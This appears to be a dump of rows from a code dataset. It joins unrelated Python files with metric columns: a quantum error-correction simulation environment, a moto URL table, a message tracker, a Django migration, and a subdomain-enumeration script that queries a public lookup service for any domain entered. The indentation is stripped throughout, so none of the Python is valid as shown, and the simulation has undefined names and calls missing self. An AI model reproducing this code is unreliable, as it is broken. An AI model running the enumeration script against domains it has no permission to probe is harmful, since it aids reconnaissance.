if self.TotalTime + (1. / self.CorrectionRate) > self.NextActionTime:
ExLocList, ExPairLocList, EmptyLocList, EmptyPairLocList, RightHoppableLocList, LeftHoppableLocList = self.ReturnExcitationInformation(self.state)
Norm = (len(RightHoppableLocList)+len(LeftHoppableLocList))*self.HoppingRate + len(ExPairLocList)*self.AnnihilationRate + \
(len(EmptyPairLocList))*self.CreationRate
self.PHop = (len(RightHoppableLocList)+len(LeftHoppableLocList))*self.HoppingRate/Norm
self.PAnn = len(ExPairLocList)*self.AnnihilationRate/Norm
self.PCre = (len(self.state) - len(ExPairLocList) - (len(RightHoppableLocList)+len(LeftHoppableLocList)))*self.HoppingRate/Norm
print RightHoppableLocList
print LeftHoppableLocList
print "**"
r = self.NextActionProbability
#print PHop, PAnn, PCre
#print r
#Hopping
if r < self.PHop:
HopSite = choice(RightHoppableLocList + LeftHoppableLocList)
self.state[HopSite] = 0
if HopSite in RightHoppableLocList:
self.state[(HopSite+1)%len(self.state)] = 1
else:
self.state[(HopSite+1)%len(self.state)] = 0
self.state[(HopSite)] = 1
self.error_state[HopSite] = (self.error_state[HopSite] + 1) % 2
#print "Hopping!"
#print chain
#Annihilating
if (r >= self.PHop and r < self.PHop + self.PAnn):
AnnihilateSite = choice(ExPairLocList)
self.state[AnnihilateSite] = 0
self.state[(AnnihilateSite+1)%len(self.state)] = 0
self.error_state[AnnihilateSite] = (self.error_state[AnnihilateSite] + 1) % 2
#print "Annihilating!"
#print chain
#Creating
if (r >= self.PHop + self.PAnn):
CreateSite = choice(EmptyPairLocList)
self.state[CreateSite] = 1
self.state[(CreateSite+1)%len(self.state)] = 1
self.error_state[CreateSite] = (self.error_state[CreateSite] + 1) % 2
#print "Creating!"
#print chain
ExLocList, ExPairLocList, EmptyLocList, EmptyPairLocList, RightHoppableLocList, LeftHoppableLocList = self.ReturnExcitationInformation(anyons_list)
Norm = (len(RightHoppableLocList)+len(LeftHoppableLocList))*self.HoppingRate + len(ExPairLocList)*self.AnnihilationRate + \
(len(EmptyPairLocList))*self.CreationRate
self.PHop = (len(RightHoppableLocList)+len(LeftHoppableLocList))*self.HoppingRate/Norm
self.PAnn = len(ExPairLocList)*self.AnnihilationRate/Norm
self.PCre = (len(anyons_list) - len(ExPairLocList) - (len(RightHoppableLocList)+len(LeftHoppableLocList)))*self.HoppingRate/Norm
#Update the system time, next action time, and next action probability
self.TotalTime = self.NextActionTime
print "Action too late!" + str(self.TotalTime)
self.NextActionProbability = random.random()
self.NextActionTime = self.TotalTime + (-1./Norm)*np.log(self.NextActionProbability)
else:
#If we haven't exceeded the bath interaction timescale, we have to apply some swaps!
anyons_list, CycleTime, NewRates, NoHops, Proceed, self.Sector = self.CorrectionProtocol(anyons_list, self.TotalTime, self.TotalTime+(1./self.CorrectionRate), self.CorrectionRate, \
self.PHop, self.PAnn, self.PCre, [action], self.Sector)
#self.TotalTime+=CycleTime
self.TotalTime+=1.
print self.TotalTime
if NewRates == True:
ExLocList, ExPairLocList, EmptyLocList, EmptyPairLocList, RightHoppableLocList, LeftHoppableLocList = self.ReturnExcitationInformation(anyons_list)
Norm = (len(RightHoppableLocList)+len(LeftHoppableLocList))*self.HoppingRate + len(ExPairLocList)*self.AnnihilationRate + \
(len(EmptyPairLocList))*self.CreationRate
self.PHop = (len(RightHoppableLocList)+len(LeftHoppableLocList))*self.HoppingRate/Norm
self.PAnn = len(ExPairLocList)*self.AnnihilationRate/Norm
self.PCre = (len(anyons_list) - len(ExPairLocList) - (len(RightHoppableLocList)+len(LeftHoppableLocList)))*self.HoppingRate/Norm
self.NextActionProbability = random.random()
self.NextActionTime = self.TotalTime + (-1./Norm)*np.log(self.NextActionProbability)
self.state = anyons_list
#Update the sector
self.Sector = (self.Sector + self.CheckSector(self.state,p,pl,pr))%2
done = self.TotalTime > 1000. \
or self.CheckState(self.state, self.Sector) == 1
done = bool(done)
if not done:
reward = 1.0
elif self.steps_beyond_done is None:
# Pole just fell!
self.steps_beyond_done = 0
reward = 1.0
else:
if self.steps_beyond_done == 0:
logger.warn("You are calling 'step()' even though this environment has already returned done = True. You should always call 'reset()' once you receive 'done = True' -- any further steps are undefined behavior.")
self.steps_beyond_done += 1
reward = 0.0
return np.array(self.state), reward, done, {}
def _reset(self):
self.state = np.zeros(self.SystemLength)
self.error_state = np.zeros(self.SystemLength)
self.TotalTime = 0.
self.state[0] = 1.
self.state[22] = 1.
self.error_state[22]=1
self.error_state[23]=1
self.steps_beyond_done = None
return np.array(self.state)
def _render(self, mode='human', close=False):
if close:
if self.viewer is not None:
self.viewer.close()
self.viewer = None
return
screen_width = 600
screen_height = 400
#world_width = self.x_threshold*2
#scale = screen_width/world_width
#carty = 100 # TOP OF CART
polewidth = 10.0
#polelen = scale * 1.0
#cartwidth = 50.0
#cartheight = 30.0
if self.viewer is None:
from gym.envs.classic_control import rendering
self.viewer = rendering.Viewer(screen_width, screen_height)#, display=self.display)
'''l,r,t,b = -cartwidth/2, cartwidth/2, cartheight/2, -cartheight/2
axleoffset =cartheight/4.0
cart = rendering.FilledPolygon([(l,b), (l,t), (r,t), (r,b)])
self.carttrans = rendering.Transform()
cart.add_attr(self.carttrans)
self.viewer.add_geom(cart)
l,r,t,b = -polewidth/2,polewidth/2,polelen-polewidth/2,-polewidth/2
pole = rendering.FilledPolygon([(l,b), (l,t), (r,t), (r,b)])
pole.set_color(.8,.6,.4)
self.poletrans = rendering.Transform(translation=(0, axleoffset))
pole.add_attr(self.poletrans)
pole.add_attr(self.carttrans)
self.viewer.add_geom(pole)'''
for i in xrange(self.SystemLength):
self.offsettrans = rendering.Transform()
self.error_offsettrans = rendering.Transform()
self.translist.append(self.offsettrans)
self.error_translist.append(self.error_offsettrans)
axle = rendering.make_circle(polewidth/2)
error = rendering.make_circle(polewidth/4)
axle.add_attr(self.offsettrans)
error.add_attr(self.error_offsettrans)
axle.set_color(.8,.6,.4)
error.set_color(.1,.1,.1)
self.viewer.add_geom(axle)
self.viewer.add_geom(error)
#print "Putting on the screen!"
#self.track = rendering.Line((0,carty), (screen_width,carty))
#self.track.set_color(0,0,0)
#self.viewer.add_geom(self.track)
for i,t in enumerate(self.translist):
#print "something happening?"
if self.state[i]!=0:
#print "Moving to be visible!"
t.set_translation(i*(400./self.SystemLength)+100., 200)
else:
t.set_translation(-10,-10)
for i,t in enumerate(self.error_translist):
if self.error_state[i]!=0:
t.set_translation(i*(400./self.SystemLength)+100. + (400./self.SystemLength)/2., 200)
else:
t.set_translation(-10,-10)
#print "This is being run, though!"
#x = self.state
#cartx = x[0]*scale+screen_width/2.0 # MIDDLE OF CART
#self.carttrans.set_translation(cartx, carty)
#self.poletrans.set_rotation(-x[2])
return self.viewer.render()#return_rgb_array = mode=='rgb_array')
#ISING CODE
#*****************************************************
def ReturnExcitationInformation(self, chain):
ExLocList = []
ExPairLocList = []
EmptyLocList = []
EmptyPairLocList = []
RightHoppableLocList = []
LeftHoppableLocList = []
for i,c in enumerate(chain):
if c == 1:
ExLocList.append(i)
if chain[(i+1)%len(chain)] == 1:
ExPairLocList.append(i)
else:
RightHoppableLocList.append(i)
else:
EmptyLocList.append(i)
if chain[(i+1)%len(chain)] == 0:
EmptyPairLocList.append(i)
else:
LeftHoppableLocList.append((i)%len(chain))
return ExLocList, ExPairLocList, EmptyLocList, EmptyPairLocList, RightHoppableLocList, LeftHoppableLocList
def CalculateProbabilities(self, chain, CreationRate, AnnihilationRate, HoppingRate):
ExLocList, ExPairLocList, EmptyLocList, EmptyPairLocList, RightHoppableLocList, LeftHoppableLocList = self.ReturnExcitationInformation(chain)
Norm = (len(RightHoppableLocList)+len(LeftHoppableLocList))*HoppingRate + len(ExPairLocList)*AnnihilationRate + \
(len(EmptyPairLocList))*CreationRate
PHop = (len(RightHoppableLocList)+len(LeftHoppableLocList))*HoppingRate/Norm
PAnn = len(ExPairLocList)*AnnihilationRate/Norm
PCre = (len(chain) - len(ExPairLocList) - (len(RightHoppableLocList)+len(LeftHoppableLocList)))*HoppingRate/Norm
return PHop, PAnn, PCre
def AdvanceTime(self, chain, StartTime, CreationRate, AnnihilationRate, HoppingRate, sector):
ExLocList, ExPairLocList, EmptyLocList, EmptyPairLocList, RightHoppableLocList, LeftHoppableLocList = self.ReturnExcitationInformation(chain)
Norm = (len(RightHoppableLocList)+len(LeftHoppableLocList))*HoppingRate + len(ExPairLocList)*AnnihilationRate + \
(len(EmptyPairLocList))*CreationRate
PHop = (len(RightHoppableLocList)+len(LeftHoppableLocList))*HoppingRate/Norm
PAnn = len(ExPairLocList)*AnnihilationRate/Norm
PCre = (len(chain) - len(ExPairLocList) - (len(RightHoppableLocList)+len(LeftHoppableLocList)))*HoppingRate/Norm
r = random.random()
DeltaTau = (-1./Norm)*np.log(r)
chain, CycleTime, NewRates, NoHops, Proceed, sector = CorrectionProtocol(chain, StartTime, StartTime+DeltaTau, CorrectionRate, \
PHop, PAnn, PCre, CorrectionSwaps, sector)
#NewRates = False
#CycleTime = 0
#NoHops = True
p = int(floor(len(chain)/2.))
pl,pr = chain[p],chain[p+1] #previous values of chain
if NewRates == False:
ExLocList, ExPairLocList, EmptyLocList, EmptyPairLocList, RightHoppableLocList, LeftHoppableLocList = self.ReturnExcitationInformation(chain)
Norm = (len(RightHoppableLocList)+len(LeftHoppableLocList))*HoppingRate + len(ExPairLocList)*AnnihilationRate + \
(len(EmptyPairLocList))*CreationRate
PHop = (len(RightHoppableLocList)+len(LeftHoppableLocList))*HoppingRate/Norm
PAnn = len(ExPairLocList)*AnnihilationRate/Norm
PCre = (len(chain) - len(ExPairLocList) - (len(RightHoppableLocList)+len(LeftHoppableLocList)))*HoppingRate/Norm
#print PHop, PAnn, PCre
#print r
#Hopping
if r < PHop:
HopSite = choice(RightHoppableLocList + LeftHoppableLocList)
chain[HopSite] = 0
if HopSite in RightHoppableLocList:
chain[(HopSite+1)%len(chain)] = 1
else:
chain[(HopSite-1)%len(chain)] = 1
#print "Hopping!"
#print chain
#Annihilating
if (r >= PHop and r < PHop + PAnn):
AnnihilateSite = choice(ExPairLocList)
chain[AnnihilateSite] = 0
chain[(AnnihilateSite+1)%len(chain)] = 0
#print "Annihilating!"
#print chain
#Creating
if (r >= PHop + PAnn):
CreateSite = choice(EmptyPairLocList)
chain[CreateSite] = 1
chain[(CreateSite+1)%len(chain)] = 1
#print "Creating!"
#print chain
sector = (sector + CheckSector(IsingChain,p,pl,pr))%2
if NoHops or not(Proceed):
return chain, DeltaTau, sector
else:
return chain, CycleTime, sector
def CheckSector(self, chain,p,pl,pr):
increment = 0
if chain[p]!=pl and chain[p+1] != pr:
increment = 1
#print p,pl,pr,"\t",chain[p],chain[p+1],"\t",increment
#print chain
return increment
#Constructs a list with the indices for conditional swaps in the correction protocol
#Convention is that the value at protocol[i] is CSWAPPED with protocol[(i+1)%length]
def SwapProtocol(self, length):
sublength = length/2 - 1
protocol = []
for i in xrange(length):
for j in xrange(sublength):
for k in xrange(sublength - j):
protocol.append((i+(j+k))%length)
for k in xrange(sublength - j):
protocol.append((i+(sublength-k-1))%length)
return protocol
def SwapProtocol2(self, length):
sublength = int(math.ceil(length/2))
subdomain = int(sublength / 2)
protocol = []
for c in xrange(4):
subprotocol = []
for i in xrange(subdomain-1):
subprotocol.append((subdomain*(c+1) + i)%length)
protocol.append(subprotocol)
for j in xrange(subdomain-1):
for k in xrange(j+1):
protocol.append((subdomain*c + k + (subdomain-1) - (j+1))%length)
protocol.append(subprotocol)
protocol = flatten(protocol)
return protocol
def SwapProtocol3(self, length):
sublength = int(math.ceil(length/2))
subdomain = int(sublength / 2)
protocol = []
for c in xrange(4):
subprotocol = []
for i in xrange(subdomain-1):
for m in xrange(i+1):
subprotocol.append((subdomain*(c+1) + i - m)%length)
protocol.append(subprotocol)
for j in xrange(subdomain-1):
for k in xrange(j+1):
protocol.append((subdomain*c + k + (subdomain-1) - (j+1))%length)
protocol.append(subprotocol)
protocol = flatten(protocol)
return protocol
def SwapProtocol4(self, length):
sublength = int(math.ceil(length/2))
subdomain = int(sublength / 4)
protocol = []
for c in xrange(8):
subprotocol = []
for i in xrange(subdomain-1):
for m in xrange(i+1):
subprotocol.append((subdomain*(c+1) + i - m)%length)
protocol.append(subprotocol)
for j in xrange(subdomain-1):
for k in xrange(j+1):
protocol.append((subdomain*c + k + (subdomain-1) - (j+1))%length)
protocol.append(subprotocol)
protocol = flatten(protocol)
return protocol
def SwapProtocol5(self, length):
sublength = int(math.ceil(length/2))
protocol = []
for j in xrange(sublength):
if j%2==0:
protocol.append(2*j)
protocol.append(2*j+1)
protocol.append(2*j)
protocol.append(2*j+1)
return protocol
def CSwap(self, chain, i):
#print i
if chain[i]!=chain[(i+1)%len(chain)]:
inter = chain[i]
chain[i] = chain[(i+1)%len(chain)]
chain[(i+1)%len(chain)] = inter
self.error_state[i] = (self.error_state[i] + 1) % 2
####print "Swapping at " + str(i) + "!: ",chain
return chain
def CorrectionProtocol(self, chain, oldtime, newtime, CorrectionRate, PHop, PAnn, PCre, CorrectionSwaps, sector):
print "Attempting correction protocol"
#print "What"
CycleTime = 0
#PHop, PAnn, PCre = CalculateProbabilities(chain, CreationRate, AnnihilationRate, HoppingRate)
#print PHop, PAnn, PCre
ProbabilityHasChanged = False
#NoChange = True
NumberOfSwaps = len(CorrectionSwaps)
#Need to calculate where the correction protocol currently is:
CorrectionPeriod = 1./CorrectionRate
NumberCompletedCycles, CurrentCycleTime = divmod(oldtime, CorrectionPeriod)
IndexInCycle = int(floor((CurrentCycleTime / CorrectionPeriod) * NumberOfSwaps))
Proceed = True
'''if (oldtime + CorrectionPeriod/NumberOfSwaps) > newtime:
Proceed = False
#psuccess = (newtime - oldtime) / (CorrectionPeriod/NumberOfSwaps)
#if random.random() < psuccess:
# Proceed = True
'''
#This loop should only execute once. lol why is it here then. Because I might generalize this later
print oldtime+CycleTime < newtime
print not(ProbabilityHasChanged)
print not(PHop == 0)
while(oldtime+CycleTime < newtime and not(ProbabilityHasChanged) and not(PHop == 0)):# and Proceed == True):# and not(PAnn > 0)):
####print "Timing information: ", CycleTime,"\t",oldtime,"\t", newtime,"\t",(newtime-oldtime)-CycleTime,"\t",CorrectionPeriod/NumberOfSwaps
#chain = self.CSwap(chain, CorrectionSwaps[IndexInCycle])
chain = self.CSwap(chain, CorrectionSwaps[0])
print "Swapping" + str(CorrectionSwaps[0])
#parallel?
#chain = CSwap(chain, CorrectionSwaps[(IndexInCycle + NumberOfSwaps/4)%NumberOfSwaps])
#chain = CSwap(chain, CorrectionSwaps[(IndexInCycle + 2*NumberOfSwaps/4)%NumberOfSwaps])
#chain = CSwap(chain, CorrectionSwaps[(IndexInCycle + 3*NumberOfSwaps/4)%NumberOfSwaps])
#chain = CSwap(chain, CorrectionSwaps[(IndexInCycle + 2*NumberOfSwaps/4)%NumberOfSwaps])
#chain = CSwap(chain, CorrectionSwaps[(IndexInCycle + 3*NumberOfSwaps/4)%NumberOfSwaps])
PHopInter, PAnnInter, PCreInter = self.CalculateProbabilities(chain, self.CreationRate, self.AnnihilationRate, self.HoppingRate)
#print PHopInter, PAnnInter, PCreInter
if (PHop != PHopInter or PAnn != PAnnInter or PCre != PCreInter):
ProbabilityHasChanged = True
IndexInCycle = (IndexInCycle+1)%NumberOfSwaps
CycleTime+=CorrectionPeriod/NumberOfSwaps
NoHops = (PHop == 0)
####print "At end of correction", chain
#print "Starttime: ",oldtime,"Candidate endtime:",newtime,"Cycle endtime:",oldtime+CycleTime
#print "New rate equations: ", ProbabilityHasChanged, "Nohops: ", NoHops, "Proceeded?", Proceed
return chain, CycleTime, ProbabilityHasChanged, NoHops, Proceed, sector
def CheckState(self, chain, sector):
if sum(chain)==0:
return 2*sector-1
else:
return 0
def ProcessTraj(self, traj,avgtraj,maxtime):
#print traj
#avgtraj[0]+=traj[0][1]
trajindex = 0
for i, val in enumerate(avgtraj):
if i < len(traj) and i > 0: #safety first!
while trajindex < len(traj) and traj[trajindex][0] < (1.0*maxtime / len(avgtraj))*i:
#print "Window: ",(1.0*maxtime / len(avgtraj))*i
trajindex+=1
avgtraj[i]+=traj[trajindex-1][1]
return avgtraj
| 34.364952 | 215 | 0.705076 | 2,612 | 21,375 | 5.730475 | 0.158882 | 0.018038 | 0.036478 | 0.063135 | 0.467731 | 0.433391 | 0.39678 | 0.368052 | 0.344335 | 0.325227 | 0 | 0.016463 | 0.167392 | 21,375 | 621 | 216 | 34.42029 | 0.824577 | 0.181988 | 0 | 0.361878 | 0 | 0.002762 | 0.021143 | 0.001397 | 0 | 0 | 0 | 0 | 0.002762 | 0 | null | null | 0 | 0.035912 | null | null | 0.033149 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
62383bc8933f1f4eaa948064e8b702400552ae83 | 428 | py | Python | resqs/core/urls.py | UMass-Rescue/moto | 3aa52aca28c622be9708da5fd31a8c8b92801634 | [
"Apache-2.0"
] | null | null | null | resqs/core/urls.py | UMass-Rescue/moto | 3aa52aca28c622be9708da5fd31a8c8b92801634 | [
"Apache-2.0"
] | null | null | null | resqs/core/urls.py | UMass-Rescue/moto | 3aa52aca28c622be9708da5fd31a8c8b92801634 | [
"Apache-2.0"
] | null | null | null | from __future__ import unicode_literals
from .responses import MotoAPIResponse
url_bases = ["https?://motoapi.amazonaws.com"]
response_instance = MotoAPIResponse()
url_paths = {
"{0}/resqs-api/$": response_instance.dashboard,
"{0}/resqs-api/data.json": response_instance.model_data,
"{0}/resqs-api/reset": response_instance.reset_response,
"{0}/resqs-api/reset-auth": response_instance.reset_auth_response,
}
| 30.571429 | 70 | 0.752336 | 53 | 428 | 5.773585 | 0.471698 | 0.261438 | 0.117647 | 0.091503 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010444 | 0.10514 | 428 | 13 | 71 | 32.923077 | 0.788512 | 0 | 0 | 0 | 0 | 0 | 0.259346 | 0.179907 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6238442b97ca6a6ef8a0ad9749bdaae56317f29d | 1,305 | py | Python | hammer/tracker.py | mizerlou/hammer | 353f176bffff4a6b7726361cdafb986fe2302f19 | [
"Apache-2.0"
] | 1 | 2016-06-06T20:22:13.000Z | 2016-06-06T20:22:13.000Z | hammer/tracker.py | mizerlou/hammer | 353f176bffff4a6b7726361cdafb986fe2302f19 | [
"Apache-2.0"
] | null | null | null | hammer/tracker.py | mizerlou/hammer | 353f176bffff4a6b7726361cdafb986fe2302f19 | [
"Apache-2.0"
] | null | null | null | import anydbm, os.path, time, bsddb, sys
class MessageTracker:
def __init__(self, tracker_file):
flag = (os.path.exists(tracker_file) and "w") or "c"
#self.tracker = anydbm.open(tracker_file, flag)
self.tracker = bsddb.hashopen(tracker_file, flag)
def close(self):
self.tracker.close()
def get_id(self, msg):
return msg["message-id"]
# return (msg["message-id"]
# + "/" + msg.get("x-from-line", msg.get("from", ""))
# + "/" + msg.get("to", ""))
def ham(self, msg):
self._add(msg, "h")
def spam(self, msg):
self._add(msg, "s")
def _add(self, msg, val):
try:
key = self.get_id(msg)
self.tracker[key] = val
except:
print >> sys.stderr, "ERROR: '%s' => '%s'", (key, val)
raise
def get(self, msg, failobj=None):
key = self.get_id(msg)
try:
return self.tracker[key]
except KeyError:
return failobj
def seen(self, msg):
return self.tracker.has_key(self.get_id(msg))
def remove(self, msg):
del self.tracker[self.get_id(msg)]
def dump(self):
for (k,v) in self.tracker.iteritems():
print k, "---", v
| 27.1875 | 68 | 0.514943 | 166 | 1,305 | 3.945783 | 0.349398 | 0.151145 | 0.054962 | 0.073282 | 0.148092 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.330268 | 1,305 | 47 | 69 | 27.765957 | 0.749428 | 0.144061 | 0 | 0.121212 | 0 | 0 | 0.032345 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.030303 | null | null | 0.060606 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
62416172cffe17c94f2ee1ae5b11d654511779a9 | 279 | py | Python | Task1/chapter14.py | shkhaider2015/AI_Lab_Task | 642a0d5e30515dac6972da194741b829cdc63f30 | [
"Unlicense"
] | null | null | null | Task1/chapter14.py | shkhaider2015/AI_Lab_Task | 642a0d5e30515dac6972da194741b829cdc63f30 | [
"Unlicense"
] | null | null | null | Task1/chapter14.py | shkhaider2015/AI_Lab_Task | 642a0d5e30515dac6972da194741b829cdc63f30 | [
"Unlicense"
] | null | null | null | # addition will takes place after multiplication and addition
num1 = 1 + 4 * 3 / 2;
# same as 5 * 3 /2
num2 = (1 + 4) * 3 / 2;
# same as 1+12/2
num3 = 1 + (4 * 3) / 2;
print("python follow precedence rules");
# this should produce 7.5
print(num1);
print(num2);
print(num3); | 18.6 | 61 | 0.620072 | 49 | 279 | 3.530612 | 0.55102 | 0.046243 | 0.052023 | 0.069364 | 0.115607 | 0.115607 | 0 | 0 | 0 | 0 | 0 | 0.125581 | 0.229391 | 279 | 15 | 62 | 18.6 | 0.67907 | 0.419355 | 0 | 0 | 0 | 0 | 0.189873 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.571429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
624ded040b53f88852fd60dd292b8fb6fb23b421 | 1,164 | py | Python | django_watermark_images/items/migrations/0001_initial.py | abarto/django-watermark-images | 5f01c8f0da7359c4d96650029d5beb70938fbe47 | [
"MIT"
] | 11 | 2016-12-05T01:12:46.000Z | 2021-05-05T21:41:14.000Z | django_watermark_images/items/migrations/0001_initial.py | abarto/django-watermark-images | 5f01c8f0da7359c4d96650029d5beb70938fbe47 | [
"MIT"
] | 1 | 2020-11-30T13:26:06.000Z | 2020-12-05T11:44:59.000Z | django_watermark_images/items/migrations/0001_initial.py | abarto/django-watermark-images | 5f01c8f0da7359c4d96650029d5beb70938fbe47 | [
"MIT"
] | 3 | 2017-02-07T03:36:42.000Z | 2020-08-10T00:16:04.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-09-10 16:15
from __future__ import unicode_literals
from django.db import migrations, models
import django_extensions.db.fields
import items.models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Item',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('title', models.CharField(max_length=255, verbose_name='title')),
('description', models.TextField(blank=True, null=True, verbose_name='description')),
('image', models.ImageField(upload_to=items.models.image_upload_to, verbose_name='original image')),
],
options={
'abstract': False,
},
),
]
| 35.272727 | 124 | 0.630584 | 121 | 1,164 | 5.876033 | 0.520661 | 0.092827 | 0.075949 | 0.101266 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021591 | 0.243986 | 1,164 | 32 | 125 | 36.375 | 0.786364 | 0.056701 | 0 | 0 | 1 | 0 | 0.088584 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
62588608a3f5e4881c91b92770889c28b45edea4 | 587 | py | Python | subdomain.py | ouldevloper/subDomainFinder | 3b888e8267d8b89401a468d2622edd6716a88293 | [
"MIT"
] | null | null | null | subdomain.py | ouldevloper/subDomainFinder | 3b888e8267d8b89401a468d2622edd6716a88293 | [
"MIT"
] | null | null | null | subdomain.py | ouldevloper/subDomainFinder | 3b888e8267d8b89401a468d2622edd6716a88293 | [
"MIT"
] | null | null | null | import requests
import re
url=input("Enter Url [ex: example.com]: ")
def getSubDomain(url):
url=url.replace("www.","").replace("https://","").replace("http://","")
pattern = "[\w]{1,256}\.[a-zA-Z0-9()]{1,6}"
_l = re.compile(pattern)
if _l.match(url):
response = requests.get(f"https://sonar.omnisint.io/subdomains/{url}").text
urls = response.split("\n")
for u in set(urls):
if u=="" or len(u)<=3:
pass
print("[+] ",u.replace("\"","").replace("'","").replace(",","").replace(" ",""))
getSubDomain(url) | 34.529412 | 95 | 0.524702 | 75 | 587 | 4.08 | 0.64 | 0.137255 | 0.137255 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019438 | 0.211244 | 587 | 17 | 96 | 34.529412 | 0.641469 | 0 | 0 | 0 | 0 | 0 | 0.27551 | 0.052721 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0.066667 | 0.133333 | 0 | 0.2 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.